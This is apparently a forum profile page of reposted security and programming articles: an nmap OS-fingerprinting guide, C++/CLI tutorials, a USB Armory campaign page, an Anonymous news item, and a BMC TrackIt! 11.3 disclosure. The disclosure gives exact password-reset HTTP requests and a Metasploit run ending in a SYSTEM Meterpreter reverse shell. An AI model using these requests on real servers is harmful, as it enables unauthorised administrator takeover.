-
Posts
3453 -
Joined
-
Last visited
-
Days Won
22
Everything posted by Aerosol
-
InfoSec Institute Firewall Script Download: Download Files. Final Injector Source Code: Download Files. Securing Your Java Code: Download Files. STIX Phishing Example: Download Files. Java Bytecode Reverse Engineering Lab Files: Download Files. Hack I-Bank Pro Files: Download Files. Injecting Spyware in an EXE (Code Injection): Download Files. Applied Reverse Engineering w/ IDA Pro: Download Files. Reverse Engineering with Reflector: Download Files. Password Analysis: Download Files. Hooking System Calls Through MSRs: Download Files. Hooking IDT: Download Files. Android Hacking- Exploiting and Securing Android Application Components: Download Files. Android Hacking (Part 2)- Content Provider Leakage: Download Files. Android Hacking (Part 3)- Exploiting Broadcast Receivers: Download Files. Overview of Android Malware Analysis: Download Files. Assembly Programming with Visual Studio.NET: Download Files. Invoking Assembly Code in C#: Download Files. Buffer Overflow Attack & Defense: Download Files. Encrypted Code Reverse Engineering- Bypassing Obfuscation: Download Files. Why Google Chrome Extensions Are Secure- Browser Security: Download Files. Android Hacking & Security Part 6: Main Activity - Debug. OWASP Practice: Learn and Play from Scratch: Download SQL, Videos, VM Guerilla Psychology and Tactical Approaches to Social Engineering: Download Files. Android Hacking: Root Detection & Evasion: Download Files. Android Hacking: Insecure Local Storage -Shared Preferences: zip, apk. Android Hacking Part 10: Insecure Local Storage: zip, external storage, internal storage, sqlitestorage, Android Hacking and Security, Part 12: rar, apk. Website Hacking 101: Download Files. Phishing WhatsApp Images Via USB: Download Files. Tracking Attackers with a Honeypot- Pt. 2 (Kippo): Download Files. Cracking Online Banking CAPTCHA Login Using Python: Download Files. Steganalysis: Your X-Ray Vision through hidden data: Download Files. XXE Attacks: Download Files. Website Hacking Part IV- Tips for Better Website Security: Download Files. Android Hacking and Security, Part 13: Introduction to Drozer: Download Files. Android Hacking and Security, Part 14: Download Files. Website Hacking Part V: Download Files. Ebooks w3af Tutorial eBook Backtrack eBook Guide to the CISSP: The Domains Introduction to Enterprise Security: A Practitioner's Guide
-
For those of us in the information technology field, there are two reasons why we should understand operating system fingerprinting. The first reason is to better design and implement security controls in networks and local machines. The second reason is that effective OS fingerprinting is a vital penetration testing skill. If an attacker can identify the operating systems that run on specific target machines, they can then learn which exact vulnerabilities to exploit. Each and every OS in deployment has unique bugs and vulnerabilities. When an exact OS is determined, it’s really easy to research what they are. That’s even often true when bug reports haven’t been sent to vendors already, and the corresponding patches have yet to be developed! So, hardening against OS fingerprinting can, in some cases, prevent zero-day attacks. OS fingerprinting techniques can be generalized into two categories, active and passive. Active OS Fingerprinting Active fingerprinting is a lot easier than passive fingerprinting, and is much more likely to return the information an attacker wants. The main reason why an attacker may prefer a passive approach is to reduce the risk of being caught by an IDS, IPS, or a firewall. It’s still important to harden against active fingerprinting. It’s the easier course of action for an attacker to execute, and they may decide to DoS (denial of service) attack network security systems first, in order to facillitate active fingerprinting. Active fingerprinting works by sending packets to a target and analyzing the packets that are sent back. Almost all active fingerprinting these days is done with Nmap. Nmap is usually used by network adminstrators to monitor the security of their networks. With Nmap, they can check to make sure that all of the firewalls in their network are properly configured, and they can also make sure that all of the TCP/IP stacks they maintain are functioning properly. But like pretty much all security tools, Nmap is an effective application for both admins and attackers. Running an OS fingerprinting scan in Nmap is as simple as typing “nmap -A ip_address_or_domain_name_of_target” Here, I OS fingerprinted my own machine by targeting “localhost“. Alternatively, you can do the same thing by targeting the IPv4 loopback address, 127.0.0.1. In the first pertinent line in the printout, I discovered that the Debian version of OpenSSH is running from port 22. That version of OpenSSH is only compatible with Debian-based Linux distros such as Ubuntu, Xubuntu, and of course, the original Debian. The second line I indicated in the printout is information that came directly from my OS kernel, it’s Linux! The third line is information the Nmap scan got about the Samba server I’m running. It says I have Samba 3.6.9, the Unix version. Although the Unix and GNU/Linux kernels are different, Samba will say it’s the Unix version for all Unix and Linux distros. So, if you put all three details together, you can infer that I’m running a Debian-based Linux distro. My machine is running Kubuntu 14.04. An attacker won’t know to try to exploit vulnerabilites specific to the Linux kernel version in Kubuntu/Ubuntu 14.04, nor will they know to exploit vulnerabilities that are specific to KDE. But there are some vulnerabilities that apply to all current Debian-based OSes. An attacker would at least know where to start. When I ran that Nmap scan, what it did was send a number of TCP, UDP, and ICMP probes to my local machine. As I’m using a well-configured firewall, I didn’t have many ports that were open. Nonetheless, Nmap sent probes to lots of different TCP/IP ports, and analyzed what returned. Specific OSes and network service applications leave different types of data in their TCP, UDP, and ICMP packets. Nmap utilizes scripting that analyzes that data to print out results that are useful for OS fingerprinting. It’s possible to sometimes get inaccurate results. If you’re unsure of the accuracy of the OS information in the Nmap printout, there’s another command you can try. “sudo nmap -O -sV -T4 -d ip_address_or_domain_name_of_target“. Using”sudo” is necessary, because the command requires root privileges in most versions of Nmap. Passive OS Fingerprinting Passive fingerprinting sniffs TCP/IP ports, rather than generating network traffic by sending packets to them. Hence, it’s a more effective way of avoiding detection or being stopped by a firewall. As of this writing, the most frequently used tools for passive fingerprinting are NetworkMiner and Satori. NetworkMiner is developed to run in Windows, but there are both native Windows and GNU/Linux versions of Satori. If you’re using a Debian-based, Fedora, or Arch Linux distro, you can still install NetworkMiner, but you’ll need to install the Mono framework first. Keep in mind that if you install NetworkMiner in a Mono-compatible GNU/Linux distro, you won’t be able to actively sniff packets. So if you’re not using a Windows machine, I’d recommend Satori instead. Passive fingerprinting uses a pcap (packet capture) API. In GNU/Linux and BSD/Unix operating systems, pcap can be found in the libpcap library, and for Windows, there’s a port of libpcap called WinPcap. While sniffing traffic, passive fingerprinting does its best to determine a target machine’s OS by analyzing the initial Time To Live (TTL) in packet IP headers, and the TCP window size in the first packet of a TCP session, which is usually either a SYN (synchronize) or SYN/ACK (synchronize and acknowledge) packet. The Internet Engineering Task Force’s (IETF) Request For Comments (RFC) recommends a default TTL of 64 milliseconds for optimal functionality. But that’s a mere recommendation, not a requirement. Passive fingerprinting can make a guess of a target’s OS, because different OSes have different TCP/IP implemetations. Typical packet specifications per OS are an initial TTL of 64 milliseconds and a TCP window size of 5840 kilobytes for Linux kernel versions 2.x, an initial TTL of 64 milliseconds and a TCP window size of 5720 kilobytes for Android and Chrome OS, 128 milliseconds and 65535 kilobytes for Windows XP, 128 milliseconds and 8192 kilobytes for Windows 7 and Server 2008, and 255 milliseconds and 4128 kilobytes for Cisco routers. But it’s imperfect to rely on those typical figures. The TTL can be changed as a sniffed packet goes from router to router. TCP window sizes can change according to a number of variables, too. Hence, passive OS fingerprinting is less accurate than active OS fingerprinting, but may be a technique chosen by an attacker or penetration tester who wants to avoid detection. If you want to better hide the OSes that run on your network devices, a lot of work is necessary. Definitely active and passive fingerprint your network first. Then you’ll know what an attacker may be able to discover. Properly configured, implemented, and maintained IDSes, IPSes, and firewalls can mitigate active fingerprinting. Passive fingerprinting can be mitigated by assuring that NICs (network interface cards) don’t operate in promiscuous mode. Or if some NICs must operate promiscuously for the sake of functionality, watch them closely and on a regular basis! Make sure there are no hubs in your network. Use switches only, and configure them properly. Implementing strong encryption in as much of your network as possible also makes packet sniffing difficult for an attacker. And finally, check all of your network logs as frequently as you can. Often, all sorts of network attacks can be prevented by analyzing logs on a regular basis. They exist for a reason, you know! References Techniques in OS Fingerprinting- Nostromo http://nostromo.joeh.org/osf.pdf Chatteronthewire.org- Satori Chatter on the Wire: OS Fingerprinting Passive OS Fingerprinting- NETRESEC Passive OS Fingerprinting - NETRESEC Blog TCP/IP Fingerprinting Methods- Nmap TCP/IP Fingerprinting Methods Supported by Nmap Source
-
Abstract This outlines the rest of the C++/CLI object oriented programming implementations such as inheritance, interface and polymorphism. We’ll understand the various control statements such as if, while and do-while, as well as other diverse loops. They include the for loop and switch by applying C++/CLI semantics under a CLR execution model. Apart from that, we’d be confronted with other significant notions such as exception handling, memory management, delegates and generics. Finally, this article illustrates how to mix implementations of native C++ code with managed C++/CLI code under CLR. Control Statements Control statements define which code should be executed from given statements. C++/CLI proposed if/else, conditional operators and switches as control statements. The if/else construct syntax is very similar to C# coding: #include "stdafx.h" using namespace System; int main(array<System::String ^> ^args) { wchar_t ltr; Console::WriteLine("Enter the Letter"); ltr= Console::Read(); if (ltr >='a') if(ltr<='z') { Console::WriteLine("you have entered small Letter"); } if (ltr >='A') if(ltr<='Z') { Console::WriteLine("you have entered capital Letter"); } return 0; } The conditional operator in C++/CLI is known as a ternary operator. The first argument must result to Boolean. If the answer is true, the first expression is evaluated. Otherwise, the second answer is: String^ str= i>5 ? “India” : “USA”; The switch construct is very similar to C#, but differs in that C++/CLI doesn’t support strings with case selection. Instead, we have to use if/else. The following sample gives you a brief of this: wchar_t days; Console::WriteLine("1 = Sunday"); Console::WriteLine("2 = Monday"); Console::WriteLine("3 = Tuesday"); Console::WriteLine("Enter your choice"); days= Console::Read(); switch(days) { case '1': Console::WriteLine("Sunday"); break; case '2': Console::WriteLine("Monday"); break; case '3': Console::WriteLine("Tuesday"); break; default: Console::WriteLine("Out of Reach"); break; } Loop Construct C++/CLI defines for, for each, while and do-while loops. With loops, code is repeatedly executed until a condition is met. The for, while and do-while loops are syntactically similar to C#: //for loop for(int i=0;i<5;i++) { //statements } //while loop int x=0; while(x<3) { //statements } //do-while loop do { //statements }while(i<3); The for each loop is introduced in C++/CLI. It doesn’t exist in ANSI C++ because that uses IEnumerable. array<int>^ arry= {1,2,3,4,5}; foreach(int x in arry) { Console::WriteLine(x); } Arrays C++/CLI introduced an array keyword in order to implement them. The keyword uses a generic syntax with angle brackets. Angle brackets are used to define the type of element. C++/CLI support array initializers with the same syntax as C#: #include "stdafx.h" using namespace System; int main(array<System::String ^> ^args) { //Array Declaration array<int>^ a1={ 10,20,30,40,50 }; for each(int i in a1) { Console::WriteLine(i); } Console::ReadLine(); return 0; } Static Members The static members can be defined by static keyword much like C#. A static field is instantiated only once for all objects of its type. We don’t need to instantiate the class in order to access the static members. Instead we can directly access them by using the class type name followed by the “::” operator: #include "stdafx.h" using namespace System; public ref class test { public: static int i; test() { i++; Console::WriteLine("Constructor Called :{0}",i); } }; int main(array<System::String ^> ^args) { test^ obj=gcnew test(); test^ obj1=gcnew test(); //directly access of static member Console::WriteLine(test::i); Console::Read(); return 0; } Interface The interface keyword is used to define an interface. Defining interfaces in C++/CLI is similar to C#, but the implementation is slightly different. The method that is defined in the interface must be implemented with virtual keyword in the child class: public interface class IDisplay { void hello(); }; public ref class test: IDisplay { public: virtual void hello() { Console::WriteLine("Hello test"); } }; Inheritance Inheritance is a mechanism in which base class members can be accessed in its corresponding derived class. All the C++/CLI classes are derived classes by default. This is because both value and reference classes have a standard base class System::Object. The base class should by followed by a colon ( in the derived class: public ref class baseClass { public: virtual void showBase() { Console::WriteLine("base class"); } }; public ref class test : baseClass { public: void showDerived() { Console::WriteLine("derieved class"); } }; int main(array<System::String ^> ^args) { test^ t=gcnew test(); t->showBase(); t->showDerived(); return 0; } The access modifier portrayed significant roles in inheritance in order to prevent the access of members inside or outside the assembly. keywords Description Public All Access Protected The access is possible in the derived class. Internal Protected Allows accessing the members from within the same assembly and from other assemblies if the type is derived from the base type. Private Outside the assembly there is none of access. Internal Access is possible in the same package or namespace. virtual Declare a method to support polymorphism. override Override virtual method in the derived class. new Hide a method from base class. Classname:: Reference the base class. this Reference the current object. sealed Stop a class to be inherited. Abstract class The abstract classes are used to implement C+ equivalents as a pure virtual function. Abstract classes are defined by the abstract keyword, which prevents you from creating objects of that class type. Unlike interfaces, we can define the implementation (body) of a function in the abstract class. The polymorphic method implementation must be marked with the override keyword in the derived class: #include "stdafx.h" using namespace System; public ref class absClass abstract { public: virtual double square(int x) abstract; virtual void show() { Console::WriteLine("showing you in abstract class"); } }; public ref class test : absClass { public: virtual double square(int x) override { return x*x; } virtual void show() override { Console::WriteLine("showing you in derived class"); } }; int main(array<System::String ^> ^args) { test^ t=gcnew test(); Console::WriteLine("square is= {0}",t->square(20)); t->show(); Console::Read(); return 0; Exception Handling C++/CLI defines the try, catch, throw and finally keywords in order to handle all run time errors in the code segments. The exception handling implementation is very similar to other CLR supported languages. The following sample handles the array out of bounds related errors by employing exception handling: int main(array<System::String ^> ^args) { array<int>^ arry= {1,2,3}; try { for(int i=0;i<=arry->Length;i++) { Console::WriteLine(arry[i]); } } catch(Exception^ ex) { Console::WriteLine(ex); } finally { Console::WriteLine("Exection Done"); } Console::Read(); return 0; } The aforementioned sample throws a run time exception which is handled by a try/catch block: Delegates Delegates are special types, a safe pointer to methods. They are defined by delegate keywords in the C++/CLI language: #include "stdafx.h" using namespace System; //delegate definition public delegate void testDel(int z); public ref class test { public: void square(int x) { Console::WriteLine("Square is=",x*x); } }; int main(array<System::String ^> ^args) { test^ t=gcnew test(); testDel^ td=gcnew testDel(t,&test::square); td(2); Console::Read(); return 0; } Generics Function Generic functions appear to do the same thing as C++ function templates did. Generic function specifications are compiled, and when you call a function that matches the generic function specification, actual type is substituted for the type parameters at execution time. No extra code is generated at compiliation time. To define delegates, C++/CLI uses the C++ like angle bracket using type parameters that are replaced by actual type when the function is called: #include "stdafx.h" using namespace System; generic<typename T> where T:IComparable T MaxElement(array<T>^ x) { T max=x[0]; for(int i=1; i< x->Length; i++) { if(max-> CompareTo(x[i]) < 0) { max=x[i]; } } return max; } int main(array<System::String ^> ^args) { array<int>^ iData= {3, 20, 4, 12, 7, 9}; int maxI= MaxElement(iData); Console::WriteLine("Max Integer is={0}",maxI); array<double>^ dData= {4.2, 2.12, 25.7,1.1}; double maxD= MaxElement(dData); Console::WriteLine("Max Double is={0}",maxD); Console::Read(); return 0; } The aforementioned sample produced a maximum number from an array using a generic function, in which type isn’t defined. Instead it’s defined at the calling time, such as integer, doubles like so: Resource Management This C++/CLI code cleans the memory resources by defining the destructor which implicitly calls the IDisposable interface. public ref class test { public: ~test() { // release resources code } }; C# using statements release resources as soon as it’s no longer used. The compile implicitly creates a try or finally statement and invokes the Dispose() method inside the finally block. C++/CLI can also use this approach, but handle it in a more elegant way; public ref class test { public: void hello() { Console::WriteLine("Hello test"); } }; int main(array<System::String ^> ^args) { //Releasing resources { test t; t.hello(); } Console::Read(); return 0; } Native and Managed Code Mixing The C++/CLI offers one of the biggest advantages. You can mix native C++ code with CLR managed code. This is referred to as it just works in C++/CLI. The following sample illustrated the mixed code by calling the cout method of the native C++ iostream namespace; #include "stdafx.h" #include <iostream> using namespace System; public ref class test { public: void managedCode() { Console::WriteLine("Hello test"); } //Native code funtion calling void nativeCode() { std::cout << "native code sample"; } }; int main(array<System::String ^> ^args) { //Releasing resources { test t; t.managedCode(); t.nativeCode(); } return 0; } Summary It’s not possible to cover each and every C++/CLI concept in a single article. This article outlines the rest of the significant topics such as arrays, control statements, generics, delegates and conditional statements in detail, by defining their semantics. We also come to understand C++/CLI OOPs concepts, such as interface, polymorphism and inheritance by going through examples. After finishing this series of articles, one can write code in C++/CLI efficiently. Source
-
Abstract This article illustrates the theory and principle behind C++/CLI programming in a .NET CLR context. We shall investigate the remarkable features of C++/CLI programming, for instance its advantage over native C++ language with a CLR context. We’ll run through the basic mechanism to create and executed CLR console and other application prototypes with the help of Visual Studio 2010. We’ll also explore the semantics of C++/CLI language in order to write and implement code. This segment also covers various significant aspects of a CLR C++ programming prototype in detail, regarding hardcore object oriented programming. Science of C++/ CLI There are two fundamentally different kinds of C++ applications you can develop with VC++ 2010. You can write applications that natively execute on your computer. These applications are defined by ISO/ANSI language standards, and referred to as native C++ programs. You can also write applications to run under the control of the CLR in an extended version of C++ and ECMA defined 355 standards, called CLR programs or C++/CLI programs. The CLR is a standardized environment for the execution of programs written in a wide range of high level languages including C#, VB and C++. The specification of CLR is now embodied in the ECMA standard for CLI (Common Language Infrastructure). That’s why C++ for the CLR is referred to as C++/CLI. CLI is essentially a specification for a virtual machine environment that enables applications written in other high-level languages to be executed in different system environments without recompiling source code. The CLI specifies a standard intermediate language (called MSIL) for the virtual machine, to which the high level language source code is compiled. Code in MSIL is ultimately mapped to machine code by a JIT compiler when you execute a program. So, code in the CLI intermediate language can be executed within any other environment that has a CLI implementation. Writing C++ Code As we’ve noted earlier, you have two options for Windows applications; you can write code that executes with the CLR, or you could also write code that compiles directly to machine code, thus executed natively. C++ code that executes with the CLR is described as managed C++ because data and code is managed by the CLR. It may release memory that you’ve allocated dynamically for storing data, automatically. This eliminates the source of common native C++ errors. The C++ code that is executed outside the CLR is referred to as unmanaged C++. So here C++/CLI posed a huge advantage over native C++. With unmanaged C++, you must take care of all aspects of allocating and releasing memory during execution of your program yourself. Also you have to shield your application from various security penetration breaches. The big advantage of C++/CLI is the ability to mix native code with managed code. You can extend existing native C++ applications and add .NET functionality, and you can add .NET classes to native libraries, so that they can be used in other .NET languages such as C# and VB. C++ / CLI “Hello world!” Project This section explains the creation of a first “Hello World!” program in the C+/CLI programming language, by using the Visual studio 2010. Although, this would the simplest logic implementation, we’re just trying to display a string value by a CLR console based application as in other C# console based applications. Here are the tutorial steps; First, make sure that the VC++ plugin is properly configured in Visual Studio 2010. If not, then re-install the software and during that process choose the VC++ options. Open Visual Studio 2010. Go to the File Menu, select New Project and you will find the VC++ language plugin in the dialog box’s left pane. Expand the VC++ and select CLR. Then, choose CLR console application from the right pane. Finally get a name to project like “CLI_test” and finally hit OK as per the above figure. Now open the CLI_test.cpp file from the solution explorer and enter this code; #include "stdafx.h" using namespace System; int main(array<System::String ^> ^args) { Console::WriteLine(L"Hello World"); Console::ReadLine(); return 0; } Finally, build the project and see the output in the console. File Create by Building the Console Application Files Extension Description .exe This is the executable file for the program. .obj Compile produces these objects files containing machine code from your program source files. .ilk Such files used by linker when you rebuild your project. .pch This is the pre-compiled header file. .idb They contain information that used when we rebuild the application. .pdb It contains debugging information that is used when we execute the program in debug mode. C++ / CLI Terminology This segment intends to kick start C++/CLI programming by outlining the essential various core C++/ CLI constructs, as well as object oriented programming related matters. Also, we’ll introduce some advanced concept implementation, like generics, exception handling, delegates and memory management by using C++ syntax under CLR arena. Namespace The .NET types are organized in a special container referred to as namespace. It can embody any types such as class, interface, structure, properties, or methods. We have to specify the namespace keyword after using in the header portion, if we want to reference some other assembly. We can define alias in C++/CLI, but they can only reference other namespace, not classes. // import reference using namespace System; using namespace System::Text; //alais using abc= System::Windows::Forms; // namespace definition namespace test { namespace ajay { namespace champu { // code…… } } } Finally, we can’t define hierarchical namespace with one namespace statement; instead the namespace must be nested. Class (Reference Type) Classes are also referred to as Reference Type in C++/CLI. A class and structure have almost the same meaning; you don’t have to separate between reference type and value type as you do with in C#. Class, typically, comes under reference type, and structure is part of value type. In C++ a ref keyword is used to define a managed class or structure. //class type public ref class testClass { }; //structure type public ref struct testStruct { }; Both structure and class are surrounded by curly braces and you must have to specify the semicolon at the end of the class declaration. When confronting with reference type variables, their object must be allocated on the managed heap. In C++/CLI, we define the handle operator ^ in order to handle the declaration of reference type. The gcnew operator allocates the memory on the managed heap. We can allocate space on the native heap by using the new keyword. //Instantiation testClass^ obj=gcnew testClass(); testSruct^ obj1= gcnew testStruct(); obj1= nullptr; We can de-reference or remove the corresponding space of a type from the memory by using the nullptr keyword, which is similar to C# null keyword. Methods The method declaration in C++/CLI is almost identical to C#, as they are always defined within a class. But with the exception that the access modifier is not part of the method declaration, but is written before it. public ref class testClass { public: void hello() { } }; Parameters can passed both value type and reference type in C++/CLI. In the case of reference type, we used the % operator which is almost identical to C# ref keyword and C++ & operator. public: void display(int x) { } void operation(int% i) { } ………………… //Method calling testClass^ xyz; testClass^ obj=gcnew testClass(); obj.operation(xyz); Constructor C++/CLI constructor has the same name as the class, like C#. But as like method declaration access modifier is detached from the constructor. public ref class testClass { public: testClass(String^ a) { this->a=a; } private: String^ a; }; Value Type To declare a value type, C++/CLI uses the value keyword before the class or structure keyword. With value type, we can allocate type space in stack. public value class testClass { } The following table poses the predefine value type list that comes under .NET and C++/CLI; C++/CLI type Size(Bytes) .NET Types wchar_t 2 Char bool 1 (true, false) Boolean short 2 Int16 int 4 Int32 long long 8 Int64 ushort 2 UInt16 unsigned int 4 UInt32 unsigned long long 8 UInt64 Enumeration Enumeration is defined with the enum keyword in C++/CLI language. This implementation is almost identical to other .NET languages such as C#. public enum class color { RED,GREEN,BLUE,BLACK }; Properties The C++/ CLI language declares the properties using the property keyword and it requires a type with the get parameter and mandatory to define a variable value with the set parameter. public ref class testClass { private: String^ name; public: property String^ Name { String^ get() { return name; } void set() { name=value; } } }; Prerequisites It’s expected that the programmers must have proficiency in native C++ object oriented programming along with a deep understanding of building and executing C++ and C# applications under .NET CLR. Summary This article depicted the importance and advantage of C++/CLI over native C++ language. We came to understanding in detail about the core anatomy of C++/CLI under CLR context. In this article, we’ve learned how to define the syntax of various core concepts like value type, reference type, methods, and enumerations. The next articles in this series will explain the rest of concepts such as interface, inheritance, polymorphism, loops, array, etc. Source
-
https://player.vimeo.com/video/114250016 An open source USB stick computer for security applications. The USB Armory is full-blown computer (800MHz ARM® processor, 512MB RAM) in a tiny form factor (65mm x 19mm x 6mm USB stick) designed from the ground up with information security applications in mind. Not only does the USB Armory have native support for many Linux distributions, it also has a completely open hardware design and a breakout prototyping header, making it a great platform on which to build other hardware. FEATURES AND SPECIFICATIONS Hardware Freescale i.MX53 ARM® Cortex™-A8 800MHz 512MB DDR3 RAM USB host powered (<500mA) Dimensions: 65mm x 19mm x 6mm user-controllable LED 7-pin breakout header [pinout of GPIOs, UART, and power] microSD card slot [https://github.com/inversepath/usbarmory/wiki/microSD-compatibility]compatibility chart] 100% open source hardware [source files and wiki] Software The USB Armory hardware is supported by standard software environments and requires very little customization effort. In fact, vanilla Linux kernels and standard distributions run seamlessly on the tiny USB Armory board: boots off of microSD card [or via USB serial downloader] native support for Android, Debian, Ubuntu, FreeBSD [it’s easy to create boot images] USB device emulation [CDC Ethernet, mass storage, HID, etc.] Connectivity High Speed USB 2.0 On-The-Go (OTG) with full device emulation full TCP/IP connection to/from USB Armory via USB CDC Ethernet emulation flash drive functionality via USB mass storage device emulation serial communication over USB or physical UART Security The ability to emulate arbitrary USB devices in combination with the i.MX53 SoC speed and fully customizable operating environment makes the USB Armory an ideal platform for all kinds of personal security applications. Not only is the USB Armory an excellent tool for testing the security of other devices, but it also has great security features itself: ARM® TrustZone® secure boot + storage + RAM user-fused keys for running only trusted firmware optional secure mode detection LED indicator minimal design limits scope of supply chain attacks great auditability due to open hardware and software The support for ARM® TrustZone®, in contrast to conventional trusted platform modules (TPMs), allows developers to engineer custom TPMs by enforcing domain separation between the “secure” and “normal” worlds that propagates throughout all SoC components, as opposed to limited only to the CPU core. APPLICATIONS $ ssh alice@10.0.0.1 Welcome to your USB armory $ ? The following example security application ideas illustrate the flexibility of the USB Armory concept: mass storage device with advanced features such as automatic encryption, virus scanning, host authentication and data self-destruct OpenSSH client and agent for untrusted hosts (e.g Internet kiosks) router for end-to-end VPN tunnelling Tor bridge [see this, for example] password manager with integrated web server electronic wallet [the Electrum Bitcoin wallet works out of the box on the USB Armory. It has been tested with X11 forwarding from Linux as well as Windows hosts.] authentication token portable penetration testing platform low level USB security testing COMMUNITY The USB Armory is an open source hardware and software project created by Inverse Path, an Italian information technology consulting group specializing in securing critical embedded systems in the avionic, automotive, and industrial control sectors. The Inverse Path team, with the help of the open source community, will develop applications that explore the potential of the USB Armory. Please participate! project home making-of presentation public repositories documentation wiki discussion group MANUFACTURING PLAN Three major revisions of the USB Armory (alpha, beta and release candidate) have been prototyped and manufactured, a local Italian manufacturer has been selected, and the first batch is ready for production. The funds raised by this campaign will go toward covering the cost of parts, fabrication, assembly, and shipping. A margin for unexpected expenses and application development has been reserved, but otherwise the price has been kept as low as possible in order to make the USB Armory a reality. There are no bulk discounts or early bird deals to ensure that everyone has the possibility of obtaining the USB Armory at the lowest price. At present, an Italian board fabricator and assembly house will produce the USB Armory and all units will be shipped to backers of the campaign through Crowd Supply’s fulfillment service in the US. First 40 Units Ship Immediately The first 40 USB Armory units sold will be shipped as soon as the campaign has reached its funding goal. These units have already been produced as part of the final test batch and are identical to those that will be in the main production run, which will ship approximately six weeks after the campaign reaches its funding goal. Source
-
BMC TrackIt! 11.3 Unauthenticated Local User Password Change Trial available here: http://www.trackit.com A Metasploit pull request has been made here: https://github.com/rapid7/metasploit-framework/pull/4359 BMC TrackIt! 11.3 when installed with TrackItWeb! allows an unauthenticated user to change any local user's password, such as Administrator. If the ability to log in remotely via SMB is enabled on the server, this can yield an unauthenticated user a shell of SYSTEM using the psexec module in Metasploit. This was tested against Windows Server 2008 R2 in a relatively default (trackit installs SQL server) installation. A domain was set up and the web server was added to the domain. Domain credentials were not able to be set, only local users. Using the Registration link in the top right of the /PasswordReset/Application/Main page, the UI requires the user's password to continue. However, the request made after to actually register the local user is disparate from the authentication request and can be sent independently. This allows an unauthenticated user to now reset that user's password. Because the Password Reset form makes a separate distinct request to check the answers to the secret question, the request to actually change a user's password can be made as any user. The first request looks like: POST /PasswordReset/Application/Register HTTP/1.1 Host: 192.168.1.57 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:26.0) Gecko/20100101 Firefox/26.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Referer: http://192.168.1.57/PasswordReset Content-Length: 318 Cookie: ASP.NET_SessionId=oyxdhg2obxlcxv30p2z0heot Connection: keep-alive Pragma: no-cache Cache-Control: no-cache domainname=WIN-P3AET0NFP1N&userName=Administrator&emailaddress=fdjhsahjfd% 40fdsafdsa.com &userQuestions=[{"Id":1,"Answer":"not"},{"Id":2,"Answer":"not"}]&updatequesChk=false&SelectedQuestion=1&SelectedQuestion=2&answer=not&answer=not&confirmanswer=not&confirmanswer=not A valid ASP.NET_SessionId is required in that a GET to the /PasswordReset/ and using the subsequent Set-Cookie in all subsequent requests as the cookie. The domainname parameter can the the name of the computer, which is the default value on the registration page. The userName parameter is the user to register with the application. You can attempt this is with a user already registered with no issue (though probably changing the secret answers to known values is probably bad too). The second request looks like this: POST /PasswordReset/Application/ResetPassword HTTP/1.1 Host: 192.168.1.57 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:26.0) Gecko/20100101 Firefox/26.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Referer: http://192.168.1.57/PasswordReset/Application/Main Content-Length: 92 Cookie: ASP.NET_SessionId=oyxdhg2obxlcxv30p2z0heot; UserName=Administrator Connection: keep-alive Pragma: no-cache Cache-Control: no-cache newPassword=n0tpassw0rd!&domain=WIN-P3AET0NFP1N&UserName=Administrator&CkbResetpassword=true The domain and UserName parameters should match those supplied in the previous registration request. The newPassword parameter will need to meet any local standard enforced by GPO. Combining these two requests will allow an unauthorised user to register a local user to be elegible for a password reset via the password reset form, then take advantage of the subsequent password reset vulnerability to change the password of any local user, including Administrator. Supplied is a metasploit auxiliary module which will change the password of the Administrator user by default, then print the domain, username, and password to user with psexec in order to log in over SMB. The below Metasploit run details changing the password with the attached module. Setting the password to the one reported by the auxiliary module, psexec is run again and a shell as NT USER/SYSTEM is gained. msf auxiliary(bmc_trackit_pwd_reset) > show options Module options (auxiliary/gather/bmc_trackit_pwd_reset): Name Current Setting Required Description ---- --------------- -------- ----------- DOMAIN no The domain of the user. By default the local user's computer name will be autodetected LOCALUSER Administrator yes The local user to change password for Proxies no Use a proxy chain RHOST 192.168.1.57 yes The target address RPORT 80 yes The target port TARGETURI / yes The path to BMC TrackIt VHOST no HTTP server virtual host msf auxiliary(bmc_trackit_pwd_reset) > run [*] Please run the psexec module using: [*] WIN-P3AET0NFP1N\Administrator:qGSvnJeuNO!1 [*] Auxiliary module execution completed msf auxiliary(bmc_trackit_pwd_reset) > use exploit/windows/smb/psexec msf exploit(psexec) > msf exploit(psexec) > set SMBPass qGSvnJeuNO!1 SMBPass => qGSvnJeuNO!1 msf exploit(psexec) > exploit [*] Started reverse handler on 192.168.1.31:4444 [*] Connecting to the server... [*] Authenticating to 192.168.1.57:445|WORKGROUP as user 'Administrator'... [*] Uploading payload... [*] Created \fNRBQEMV.exe... [*] Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.1.57[\svcctl] ... [*] Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.1.57[\svcctl] ... [*] Obtaining a service manager handle... [*] Creating a new service (NOAlMwJR - "MBvX")... [*] Closing service handle... [*] Opening service... [*] Starting the service... [*] Removing the service... [*] Closing service handle... [*] Deleting \fNRBQEMV.exe... [*] Sending stage (769024 bytes) to 192.168.1.57 [*] Meterpreter session 4 opened (192.168.1.31:4444 -> 192.168.1.57:50668) at 2014-10-12 00:44:12 -0500 meterpreter > getuid Server username: NT AUTHORITY\SYSTEM meterpreter > -- http://volatile-minds.blogspot.com -- blog http://www.volatileminds.net -- website Source
-
AMHERST – A group purporting to be members of the hacker collective Anonymous is taking aim at Nova Scotia Power. In a ’ made late Wednesday, the group says it has information showing corruption within the monopoly.They are calling the action #OpTakeNSPowerBack. “For too long we have closely watched as Nova Scotians have struggled with their power bills. We have watched as they have had to make tough choices between power, food and heat, mortgages, and other costs of living,” the video says. The group calls the decisions Nova Scotians are making today in the face of high energy costs cruel and uncalled for sacrifices. “Nova Scotia has had enough. It is now time for you to take note of our demands,” the video says. The demands include reasonable power rates, to not disconnect the power of those unable to pay their bills, commit to actual power usage instead of estimated charges, a five-year wage freeze for all corporate members and cutting corporate kickbacks and bonuses. The group was vague on possible consequences if its demands were not met, only saying they have information that will confirm corruption within the private monopoly. The video released Wednesday can be viewed by .Source
-
